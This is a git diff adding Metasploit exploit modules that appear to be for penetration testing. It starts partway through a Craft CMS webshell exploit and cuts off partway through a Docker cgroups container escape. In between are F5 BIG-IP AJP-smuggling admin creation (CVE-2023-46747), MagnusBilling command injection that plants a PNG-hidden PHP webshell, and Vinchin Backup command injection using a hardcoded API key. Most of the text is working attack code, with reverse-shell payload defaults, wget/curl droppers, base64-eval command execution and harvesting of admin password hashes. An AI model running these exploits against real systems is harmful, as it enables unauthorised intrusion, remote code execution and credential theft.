+ form_data = Rex::MIME::Message.new
+ form_data.add_part('conditions/render', nil, nil, 'form-data; name="action"')
+ form_data.add_part('craft\elements\conditions\ElementCondition', nil, nil, 'form-data; name="configObject[class]"')
+ form_data.add_part('{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}', nil, nil, 'form-data; name="config"')
+ form_data.add_part(payload, 'text/plain', nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(4..8)}\"; filename=\"#{Rex::Text.rand_text_alpha(4..8)}.msl\"")
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(datastore['TARGETURI']),
+ 'ctype' => "multipart/form-data; boundary=#{form_data.bound}",
+ 'data' => form_data.to_s
+ })
+ if res && res.code == 502
+ # code 502 indicates a successful upload of the MSL payload in upload_tmp_dir (default /tmp unless specified in php.ini)
+ # next step is to generate the webshell in DOCUMENT_ROOT by executing the Imagick MSL payload
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(datastore['TARGETURI']),
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'vars_post' => {
+ 'action' => 'conditions/render',
+ 'configObject[class]' => 'craft\elements\conditions\ElementCondition',
+ 'config' => "{\"name\":\"configObject\",\"as \":{\"class\":\"Imagick\", \"__construct()\":{\"files\":\"vid:msl:#{@config['upload_tmp_dir']}/php*\"}}}"
+ }
+ })
+ # code 502 indicates a successful generation of the webshell in DOCUMENT_ROOT
+ return res&.code == 502
+ end
+ false
+ end
+
+ def execute_command(cmd, _opts = {})
+ payload = Base64.strict_encode64(cmd)
+ return send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(datastore['TARGETURI'], @webshell_name),
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'vars_post' => {
+ @post_param => payload
+ }
+ })
+ end
+
+ def on_new_session(session)
+ # cleanup webshell in DOCUMENT_ROOT
+ register_files_for_cleanup("#{@config['document_root']}/#{@webshell_name}")
+
+ # Imagick plugin generates a php file with MSL code in the directory set by
+ # the PHP ini setting "upload_tmp_dir". This file gets executed to generate the webshell.
+ # A manual cleanup procedure is required to identify and remove the php* files when the session is established.
+ if session.type == 'meterpreter'
+ session.fs.dir.chdir(@config['upload_tmp_dir'].to_s)
+ clean_files = session.fs.dir.entries
+ else
+ clean_files = session.shell_command_token("cd #{@config['upload_tmp_dir']};ls php*").split(' ')
+ end
+ unless clean_files.blank?
+ clean_files.each do |f|
+ register_files_for_cleanup("#{@config['upload_tmp_dir']}/#{f}") if f.match(/^php+/)
+ end
+ end
+ super
+ end
+
+ def check
+ check_phpinfo
+ return CheckCode::Appears unless @config['upload_tmp_dir'].nil? || @config['document_root'].nil?
+
+ CheckCode::Safe
+ end
+
+ def exploit
+ # check if upload_tmp_dir and document_root is already initialized with AutoCheck set otherwise run check_phpinfo
+ check_phpinfo unless datastore['AutoCheck']
+ fail_with(Failure::NotVulnerable, 'Could not get required phpinfo. System is likely patched.') if @config['upload_tmp_dir'].nil? || @config['document_root'].nil?
+ fail_with(Failure::UnexpectedReply, "Webshell #{@webshell_name} upload failed.") unless upload_webshell
+
+ print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+ case target['Type']
+ when :php, :unix_cmd
+ execute_command(payload.encoded)
+ when :linux_dropper
+ execute_cmdstager(linemax: 65536)
+ end
+ end
+end
diff --git a/modules/exploits/linux/http/f5_bigip_tmui_rce.rb b/modules/exploits/linux/http/f5_bigip_tmui_rce_cve_2020_5902.rb
similarity index 98%
rename from modules/exploits/linux/http/f5_bigip_tmui_rce.rb
rename to modules/exploits/linux/http/f5_bigip_tmui_rce_cve_2020_5902.rb
index f0574bde60..b3e4d70f16 100644
--- a/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
+++ b/modules/exploits/linux/http/f5_bigip_tmui_rce_cve_2020_5902.rb
@@ -11,6 +11,8 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper
+ include Msf::Exploit::Deprecated
+ moved_from 'exploit/linux/http/f5_bigip_tmui_rce'
def initialize(info = {})
super(
diff --git a/modules/exploits/linux/http/f5_bigip_tmui_rce_cve_2023_46747.rb b/modules/exploits/linux/http/f5_bigip_tmui_rce_cve_2023_46747.rb
new file mode 100644
index 0000000000..74267845b3
--- /dev/null
+++ b/modules/exploits/linux/http/f5_bigip_tmui_rce_cve_2023_46747.rb
@@ -0,0 +1,292 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/proto/apache_j_p'
+
+class MetasploitModule < Msf::Exploit::Remote
+
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Retry
+
+ ApacheJP = Rex::Proto::ApacheJP
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'F5 BIG-IP TMUI AJP Smuggling RCE',
+ 'Description' => %q{
+ This module exploits a flaw in F5's BIG-IP Traffic Management User Interface (TMUI) that enables an external,
+ unauthenticated attacker to create an administrative user. Once the user is created, the module uses the new
+ account to execute a command payload. Both the exploit and check methods automatically delete any temporary
+ accounts that are created.
+ },
+ 'Author' => [
+ 'Michael Weber', # vulnerability analysis
+ 'Thomas Hendrickson', # vulnerability analysis
+ 'Sandeep Singh', # nuclei template
+ 'Spencer McIntyre' # metasploit module
+ ],
+ 'References' => [
+ ['CVE', '2023-46747'],
+ ['URL', 'https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/'],
+ ['URL', 'https://www.praetorian.com/blog/advisory-f5-big-ip-rce/'],
+ ['URL', 'https://my.f5.com/manage/s/article/K000137353'],
+ ['URL', 'https://github.com/projectdiscovery/nuclei-templates/pull/8496'],
+ ['URL', 'https://attackerkb.com/topics/t52A9pctHn/cve-2023-46747/rapid7-analysis']
+ ],
+ 'DisclosureDate' => '2023-10-26', # Vendor advisory
+ 'License' => MSF_LICENSE,
+ 'Platform' => ['unix', 'linux'],
+ 'Arch' => [ARCH_CMD],
+ 'Privileged' => true,
+ 'Targets' => [
+ [
+ 'Command',
+ {
+ 'Platform' => ['unix', 'linux'],
+ 'Arch' => ARCH_CMD
+ }
+ ],
+ ],
+ 'DefaultOptions' => {
+ 'SSL' => true,
+ 'RPORT' => 443,
+ 'FETCH_WRITABLE_DIR' => '/tmp'
+ },
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'Reliability' => [],
+ 'SideEffects' => [
+ IOC_IN_LOGS, # user creation events are logged
+ CONFIG_CHANGES # a temporary user is created then deleted
+ ]
+ }
+ )
+ )
+
+ register_options([
+ OptString.new('TARGETURI', [true, 'Base path', '/'])
+ ])
+ end
+
+ def check
+ res = create_user(role: 'Guest')
+ return CheckCode::Unknown('No response received from target.') unless res
+ return CheckCode::Safe('Failed to create the user.') unless res.code == 200
+
+ changed = update_user_password
+ return CheckCode::Safe('Failed to set the new user\'s password.') unless changed
+
+ res = bigip_api_tm_get_user(username)
+ return CheckCode::Safe('Failed to validate the new user account.') unless res.get_json_document['kind'] == 'tm:auth:user:userstate'
+
+ CheckCode::Vulnerable('Successfully tested unauthenticated user creation.')
+ end
+
+ def exploit
+ res = create_user(role: 'Administrator')
+ fail_with(Failure::UnexpectedReply, 'Failed to create the user.') unless res&.code == 200
+
+ changed = update_user_password
+ fail_with(Failure::UnexpectedReply, 'Failed to set the new user\'s password.') unless changed
+
+ print_good("Admin user was created successfully. Credentials: #{username} - #{password}")
+
+ res = bigip_api_tm_get_user('admin')
+ if res&.code == 200 && (hash = res.get_json_document['encryptedPassword']).present?
+ print_good("Retrieved the admin hash: #{hash}")
+ report_hash('admin', hash)
+ end
+
+ logged_in = retry_until_truthy(timeout: 30) do
+ res = bigip_api_shared_login
+ res&.code == 200
+ end
+ fail_with(Failure::UnexpectedReply, 'Failed to login.') unless logged_in
+
+ token = res.get_json_document.dig('token', 'token')
+ fail_with(Failure::UnexpectedReply, 'Failed to obtain a login token.') if token.blank?
+
+ print_status("Obtained login token: #{token}")
+
+ bash_cmd = "eval $(echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d)"
+ # this may or may not timeout
+ send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'mgmt/tm/util/bash'),
+ 'headers' => {
+ 'Content-Type' => 'application/json',
+ 'X-F5-Auth-Token' => token
+ },
+ 'data' => { 'command' => 'run', 'utilCmdArgs' => "-c '#{bash_cmd}'" }.to_json
+ )
+ end
+
+ def report_hash(user, hash)
+ jtr_format = Metasploit::Framework::Hashes.identify_hash(hash)
+ service_data = {
+ address: rhost,
+ port: rport,
+ service_name: 'F5 BIG-IP TMUI',
+ protocol: 'tcp',
+ workspace_id: myworkspace_id
+ }
+ credential_data = {
+ module_fullname: fullname,
+ origin_type: :service,
+ private_data: hash,
+ private_type: :nonreplayable_hash,
+ jtr_format: jtr_format,
+ username: user
+ }.merge(service_data)
+
+ credential_core = create_credential(credential_data)
+
+ login_data = {
+ core: credential_core,
+ status: Metasploit::Model::Login::Status::UNTRIED
+ }.merge(service_data)
+
+ create_credential_login(login_data)
+ end
+
+ def cleanup
+ super
+
+ print_status('Deleting the created user...')
+ delete_user
+ end
+
+ def username
+ @username ||= rand_text_alpha(6..8)
+ end
+
+ def password
+ @password ||= rand_text_alphanumeric(16..20)
+ end
+
+ def create_user(role:)
+ # for roles and descriptions, see: https://techdocs.f5.com/kb/en-us/products/big-ip_ltm/manuals/product/bigip-user-account-administration-11-6-0/3.html
+ send_request_smuggled_ajp({
+ 'handler' => '/tmui/system/user/create',
+ 'form_page' => '/tmui/system/user/create.jsp',
+ 'systemuser-hidden' => "[[\"#{role}\",\"[All]\"]]",
+ 'systemuser-hidden_before' => '',
+ 'name' => username,
+ 'name_before' => '',
+ 'passwd' => password,
+ 'passwd_before' => '',
+ 'finished' => 'x',
+ 'finished_before' => ''
+ })
+ end
+
+ def delete_user
+ send_request_smuggled_ajp({
+ 'handler' => '/tmui/system/user/list',
+ 'form_page' => '/tmui/system/user/list.jsp',
+ 'checkbox0' => username,
+ 'checkbox0_before' => 'checked',
+ 'delete_confirm' => 'Delete',
+ 'delete_confirm_before' => 'Delete',
+ 'row_count' => '1',
+ 'row_count_before' => '1'
+ })
+ end
+
+ def update_user_password
+ new_password = Rex::Text.rand_text_alphanumeric(password.length)
+ changed = retry_until_truthy(timeout: 30) do
+ res = bigip_api_shared_set_password(username, password, new_password)
+ res&.code == 200
+ end
+ @password = new_password if changed
+ changed
+ end
+
+ def send_request_smuggled_ajp(query)
+ post_data = "204\r\n" # do not change
+
+ timenow = rand_text_numeric(1)
+ tmui_dubbuf = rand_text_alpha_upper(11)
+
+ query = query.merge({
+ '_bufvalue' => Base64.strict_encode64(OpenSSL::Digest::SHA1.new(tmui_dubbuf + timenow).digest),
+ '_bufvalue_before' => '',
+ '_timenow' => timenow,
+ '_timenow_before' => ''
+ })
+ query_string = URI.encode_www_form(query).ljust(370, '&')
+
+ # see: https://tomcat.apache.org/tomcat-3.3-doc/ApacheJP.html#prefix-codes
+ ajp_forward_request = ApacheJP::ApacheJPForwardRequest.new(
+ http_method: ApacheJP::ApacheJPForwardRequest::HTTP_METHOD_POST,
+ req_uri: '/tmui/Control/form',
+ remote_addr: '127.0.0.1',
+ remote_host: 'localhost',
+ server_name: 'localhost',
+ headers: [
+ { header_name: 'Tmui-Dubbuf', header_value: tmui_dubbuf },
+ { header_name: 'REMOTEROLE', header_value: '0' },
+ { header_name: 'host', header_value: 'localhost' }
+ ],
+ attributes: [
+ { code: ApacheJP::ApacheJPRequestAttribute::CODE_REMOTE_USER, attribute_value: 'admin' },
+ { code: ApacheJP::ApacheJPRequestAttribute::CODE_QUERY_STRING, attribute_value: query_string },
+ { code: ApacheJP::ApacheJPRequestAttribute::CODE_TERMINATOR }
+ ]
+ )
+ ajp_data = ajp_forward_request.to_binary_s[2...]
+ unless ajp_data.length == 0x204 # 516 bytes
+ # this is a developer error
+ raise "AJP data must be 0x204 bytes, is 0x#{ajp_data.length.to_s(16)} bytes."
+ end
+
+ post_data << ajp_data
+ post_data << "\r\n0"
+
+ send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'tmui/login.jsp'),
+ 'headers' => { 'Transfer-Encoding' => 'chunked, chunked' },
+ 'data' => post_data
+ )
+ end
+
+ def bigip_api_shared_set_password(user, old_password, new_password)
+ send_request_cgi(
+ 'method' => 'PATCH',
+ 'uri' => normalize_uri(target_uri.path, 'mgmt/shared/authz/users', user),
+ 'headers' => {
+ 'Authorization' => "Basic #{Rex::Text.encode_base64("#{username}:#{password}")}",
+ 'Content-Type' => 'application/json'
+ },
+ 'data' => { 'oldPassword' => old_password, 'password' => new_password }.to_json
+ )
+ end
+
+ def bigip_api_shared_login
+ send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'mgmt/shared/authn/login'),
+ 'headers' => { 'Content-Type' => 'application/json' },
+ 'data' => { 'username' => username, 'password' => password }.to_json
+ )
+ end
+
+ def bigip_api_tm_get_user(user)
+ send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'mgmt/tm/auth/user', user),
+ 'headers' => {
+ 'Authorization' => "Basic #{Rex::Text.encode_base64("#{username}:#{password}")}",
+ 'Content-Type' => 'application/json'
+ }
+ )
+ end
+end
diff --git a/modules/exploits/linux/http/magnusbilling_unauth_rce_cve_2023_30258.rb b/modules/exploits/linux/http/magnusbilling_unauth_rce_cve_2023_30258.rb
new file mode 100644
index 0000000000..8bef373b0d
--- /dev/null
+++ b/modules/exploits/linux/http/magnusbilling_unauth_rce_cve_2023_30258.rb
@@ -0,0 +1,187 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/stopwatch'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+ include Msf::Exploit::FileDropper
+ include Msf::Exploit::Format::PhpPayloadPng
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'MagnusBilling application unauthenticated Remote Command Execution.',
+ 'Description' => %q{
+ A Command Injection vulnerability in MagnusBilling application 6.x and 7.x allows
+ remote attackers to run arbitrary commands via unauthenticated HTTP request.
+ A piece of demonstration code is present in `lib/icepay/icepay.php`, with a call to an exec().
+ The parameter to exec() includes the GET parameter `democ`, which is controlled by the user and
+ not properly sanitised/escaped.
+ After successful exploitation, an unauthenticated user is able to execute arbitrary OS commands.
+ The commands run with the privileges of the web server process, typically `www-data` or `asterisk`.
+ At a minimum, this allows an attacker to compromise the billing system and its database.
+
+ The following MagnusBilling applications are vulnerable:
+ - MagnusBilling application version 6 (all versions);
+ - MagnusBilling application up to version 7.x without commit 7af21ed620 which fixes this vulnerability;
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'h00die-gr3y ', # MSF module contributor
+ 'Eldstal' # Discovery of the vulnerability
+
+ ],
+ 'References' => [
+ ['CVE', '2023-30258'],
+ ['URL', 'https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258'],
+ ['URL', 'https://eldstal.se/advisories/230327-magnusbilling.html']
+ ],
+ 'DisclosureDate' => '2023-06-26',
+ 'Platform' => ['php', 'unix', 'linux'],
+ 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86],
+ 'Privileged' => true,
+ 'Targets' => [
+ [
+ 'PHP',
+ {
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Type' => :php,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+ }
+ }
+ ],
+ [
+ 'Unix Command',
+ {
+ 'Platform' => ['unix', 'linux'],
+ 'Arch' => ARCH_CMD,
+ 'Type' => :unix_cmd,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'cmd/unix/reverse_bash'
+ }
+ }
+ ],
+ [
+ 'Linux Dropper',
+ {
+ 'Platform' => ['linux'],
+ 'Arch' => [ARCH_X64, ARCH_X86],
+ 'Type' => :linux_dropper,
+ 'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'],
+ 'Linemax' => 2048,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+ }
+ }
+ ]
+ ],
+ 'DefaultTarget' => 0,
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'Reliability' => [REPEATABLE_SESSION],
+ 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+ }
+ )
+ )
+ register_options([
+ OptString.new('TARGETURI', [ true, 'The MagnusBilling endpoint URL', '/mbilling' ]),
+ OptString.new('WEBSHELL', [
+ false, 'The name of the webshell with extension. Webshell name will be randomly generated if left unset.', nil
+ ], conditions: %w[TARGET == 0])
+ ])
+ end
+
+ def execute_command(cmd, _opts = {})
+ return send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'lib', 'icepay', 'icepay.php'),
+ 'vars_get' =>
+ {
+ 'democ' => "/dev/null;#{cmd};#"
+ }
+ })
+ end
+
+ def execute_php(cmd, _opts = {})
+ payload = Base64.strict_encode64(cmd)
+ return send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'lib', 'icepay', @webshell_name),
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'vars_post' => {
+ @post_param => payload
+ }
+ })
+ end
+
+ def upload_webshell
+ # randomize file name if option WEBSHELL is not set
+ @webshell_name = if datastore['WEBSHELL'].blank?
+ "#{Rex::Text.rand_text_alpha(8..16)}.php"
+ else
+ datastore['WEBSHELL'].to_s
+ end
+
+ @post_param = Rex::Text.rand_text_alphanumeric(1..8)
+
+ # inject PHP payload into the PLTE chunk of a PNG image to hide the payload
+ php_payload = ""
+ png_webshell = inject_php_payload_png(php_payload, injection_method: 'PLTE')
+ return nil if png_webshell.nil?
+
+ # encode webshell data, set write and execute permissions and write to file on the target for execution
+ payload = Base64.strict_encode64(png_webshell.to_s)
+ cmd = "chmod 755 ./;echo #{payload}|base64 -d > ./#{@webshell_name}"
+ execute_command(cmd)
+ end
+
+ def check
+ print_status("Checking if #{peer} can be exploited.")
+ res = send_request_cgi!({
+ 'method' => 'GET',
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'uri' => normalize_uri(target_uri.path)
+ })
+ # Check if target is a magnusbilling application
+ return CheckCode::Unknown('No response received from target.') unless res
+ return CheckCode::Safe('Likely not a magnusbilling application.') unless res.code == 200 && res.body =~ /MagnusBilling/i
+
+ # blind command injection using sleep command
+ sleep_time = rand(4..8)
+ print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
+ _res, elapsed_time = Rex::Stopwatch.elapsed_time do
+ execute_command("sleep #{sleep_time}")
+ end
+ print_status("Elapsed time: #{elapsed_time.round(2)} seconds.")
+ return CheckCode::Safe('Command injection test failed.') unless elapsed_time >= sleep_time
+
+ CheckCode::Vulnerable('Successfully tested command injection.')
+ end
+
+ def exploit
+ print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+ case target['Type']
+ when :php
+ res = upload_webshell
+ fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200
+ register_file_for_cleanup(@webshell_name.to_s)
+ execute_php(payload.encoded)
+ when :unix_cmd
+ execute_command(payload.encoded)
+ when :linux_dropper
+ # Don't check the response here since the server won't respond
+ # if the payload is successfully executed.
+ execute_cmdstager({ linemax: target.opts['Linemax'] })
+ end
+ end
+end
diff --git a/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb b/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
new file mode 100644
index 0000000000..c821f39919
--- /dev/null
+++ b/modules/exploits/linux/http/vinchin_backup_recovery_cmd_inject.rb
@@ -0,0 +1,109 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Vinchin Backup and Recovery Command Injection',
+ 'Description' => %q{
+ This module exploits a command injection vulnerability in Vinchin Backup & Recovery
+ v5.0.*, v6.0.*, v6.7.*, and v7.0.*. Due to insufficient input validation in the
+ checkIpExists API endpoint, an attacker can execute arbitrary commands as the
+ web server user.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'Gregory Boddin (LeakIX)', # Vulnerability discovery
+ 'Valentin Lobstein' # Metasploit module
+ ],
+ 'References' => [
+ ['CVE', '2023-45498'],
+ ['CVE', '2023-45499'],
+ ['URL', 'https://blog.leakix.net/2023/10/vinchin-backup-rce-chain/'],
+ ['URL', 'https://vinchin.com/'] # Vendor URL
+ ],
+ 'DisclosureDate' => '2023-10-26',
+ 'Notes' => {
+ 'Stability' => [ CRASH_SAFE ],
+ 'SideEffects' => [ IOC_IN_LOGS ],
+ 'Reliability' => [ REPEATABLE_SESSION ],
+ 'AKA' => ['Vinchin Command Injection']
+ },
+ 'Platform' => ['linux', 'unix'],
+ 'Arch' => [ARCH_CMD],
+ 'Targets' => [
+ ['Automatic', {}]
+ ],
+
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => {
+ 'SSL' => true,
+ 'FETCH_WRITABLE_DIR' => '/usr/share/nginx/vinchin/tmp'
+ },
+ 'Privileged' => false
+ )
+ )
+ register_options(
+ [
+ Opt::RPORT(443),
+ OptString.new('TARGETURI', [true, 'The base path to the Vinchin Backup & Recovery application', '/']),
+ OptString.new('APIKEY', [true, 'The hardcoded API key', '6e24cc40bfdb6963c04a4f1983c8af71']),
+ ]
+ )
+ end
+
+ def exploit
+ hex_encoded_payload = payload.encoded.unpack('H*').first
+ formatted_payload = hex_encoded_payload.scan(/../).map { |x| "\\\\x#{x}" }.join
+
+ temp_file = "#{datastore['FETCH_WRITABLE_DIR']}/#{Rex::Text.rand_text_alpha(8)}"
+ command = "echo -e #{formatted_payload}|tee #{temp_file};chmod 777 #{temp_file};#{temp_file};rm #{temp_file}"
+ send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(datastore['TARGETURI'], 'api/'),
+ 'vars_get' => {
+ 'm' => '30',
+ 'f' => 'checkIpExists',
+ 'k' => datastore['APIKEY']
+ },
+ 'data' => "p={\"ip\":\"a||#{command}\"}"
+ })
+ end
+
+ def check
+ target_uri_path = normalize_uri(target_uri.path, 'login.php')
+ res = send_request_cgi('uri' => target_uri_path)
+
+ return CheckCode::Unknown('Failed to connect to the target.') unless res
+ return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200
+
+ version_pattern = /Vinchin build: (\d+\.\d+\.\d+\.\d+)/
+ version_match = res.body.match(version_pattern)
+
+ unless version_match && version_match[1]
+ return CheckCode::Unknown('Unable to extract version.')
+ end
+
+ version = Rex::Version.new(version_match[1])
+ print_status("Detected Vinchin version: #{version}")
+
+ if (version >= Rex::Version.new('5.0.0') && version < Rex::Version.new('5.1.0')) ||
+ (version >= Rex::Version.new('6.0.0') && version < Rex::Version.new('6.1.0')) ||
+ (version >= Rex::Version.new('6.7.0') && version < Rex::Version.new('6.8.0')) ||
+ (version >= Rex::Version.new('7.0.0') && version < Rex::Version.new('7.0.2'))
+ return CheckCode::Appears
+ else
+ return CheckCode::Safe
+ end
+ end
+end
diff --git a/modules/exploits/linux/local/docker_cgroup_escape.rb b/modules/exploits/linux/local/docker_cgroup_escape.rb
new file mode 100644
index 0000000000..a54188a6bb
--- /dev/null
+++ b/modules/exploits/linux/local/docker_cgroup_escape.rb
@@ -0,0 +1,163 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html
+
+ include Msf::Post::Linux::Priv
+ include Msf::Post::Linux::Kernel
+ include Msf::Post::File
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Docker cgroups Container Escape',
+ 'Description' => %q{
+ This exploit module takes advantage of a Docker image which has either the privileged flag, or SYS_ADMIN Linux capability.
+ If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system.
+
+ A vulnerability was found in the Linux kernel's cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function.
+ This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges
+ and bypass the namespace isolation unexpectedly.
+
+ More simply put, cgroups v1 has a feature called release_agent that runs a program when a process in the cgroup terminates.
+ If notify_on_release is enabled, the kernel runs the release_agent binary as root. By editing the release_agent file,
+ an attacker can execute their own binary with elevated privileges, taking control of the system. However, the release_agent
+ file is owned by root, so only a user with root access can modify it.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'h00die', # msf module
+ 'Yiqi Sun', # discovery
+ 'Kevin Wang', # discovery
+ 'T1erno', # POC
+ ],
+ 'Platform' => [ 'unix', 'linux' ],
+ 'SessionTypes' => ['meterpreter'],
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+ },
+ 'Privileged' => true,
+ 'References' => [
+ [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=24f6008564183aa120d07c03d9289519c2fe02af'],
+ [ 'URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'],
+ [ 'URL', 'https://github.com/T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC'],
+ [ 'URL', 'https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492'],
+ [ 'URL', 'https://github.com/SofianeHamlaoui/CVE-2022-0492-Checker/blob/main/escape-check.sh'],
+ [ 'URL', 'https://pwning.systems/posts/escaping-containers-for-fun/'],
+ [ 'URL', 'https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html'],
+ [ 'URL', 'https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation'],
+ [ 'URL', 'https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/'],
+ [ 'CVE', '2022-0492']
+ ],
+ 'DisclosureDate' => '2022-02-04',
+ 'Targets' => [
+ ['BINARY', { 'Arch' => [ARCH_X86, ARCH_X64], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } }],
+ ['CMD', { 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } }]
+ ],
+ 'DefaultTarget' => 0,
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'Reliability' => [REPEATABLE_SESSION],
+ 'SideEffects' => [ARTIFACTS_ON_DISK]
+ }
+ )
+ )
+ register_advanced_options [
+ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+ ]
+ end
+
+ def base_dir
+ datastore['WritableDir']
+ end
+
+ def check
+ print_status('Unable to determine host OS, this check method is unlikely to be accurate if the host isn\'t Ubuntu')
+ release = kernel_release
+ # https://people.canonical.com/~ubuntu-security/cve/2022/CVE-2022-0492
+ release_short = Rex::Version.new(release.split('-').first)
+ release_long = Rex::Version.new(release.split('-')[0..1].join('-'))
+ if release_short >= Rex::Version.new('5.13.0') && release_long < Rex::Version.new('5.13.0-37.42') || # Ubuntu 21.10
+ release_short >= Rex::Version.new('5.4.0') && release_long < Rex::Version.new('5.4.0-105.119') || # Ubuntu 20.04 LTS
+ release_short >= Rex::Version.new('4.15.0') && release_long < Rex::Version.new('4.15.0-173.182') || # Ubuntu 18.04 LTS
+ release_short >= Rex::Version.new('4.4.0') && release_long < Rex::Version.new('4.4.0-222.255') # Ubuntu 16.04 ESM
+ return CheckCode::Vulnerable("IF host OS is Ubuntu, kernel version #{release} is vulnerable")
+ end
+
+ CheckCode::Safe("Kernel version #{release} may not be vulnerable depending on the host OS")
+ end
+
+ def exploit
+ # Check if we're already root as its required
+ fail_with(Failure::NoAccess, 'The exploit needs a session as root (uid 0) inside the container') unless is_root?
+
+ # create mount
+ folder = rand_text_alphanumeric(5..10)
+ @mount_dir = "#{base_dir}/#{folder}"
+ register_dir_for_cleanup(@mount_dir)
+ vprint_status("Creating folder for mount: #{@mount_dir}")
+ mkdir(@mount_dir)
+ print_status('Mounting cgroup')
+ cmd_exec("mount -t cgroup -o rdma cgroup '#{@mount_dir}'")
+ group = rand_text_alphanumeric(5..10)
+ group_full_dir = "#{@mount_dir}/#{group}"
+ vprint_status("Creating folder in cgroup for exploitation: #{group_full_dir}")
+ mkdir(group_full_dir)
+
+ print_status("Enabling notify on release for group #{group}")
+ write_file("#{group_full_dir}/notify_on_release", '1')
+
+ print_status('Determining the host OS path for image')
+ # for this, we need the line that starts with overlay, and contains an 'upperdir' parameter, which we want the value of
+ mtab_file = read_file('/etc/mtab')
+ host_path = nil
+ mtab_file.each_line do |line|
+ next unless line.start_with?('overlay') && line.include?('perdir') # upperdir
+
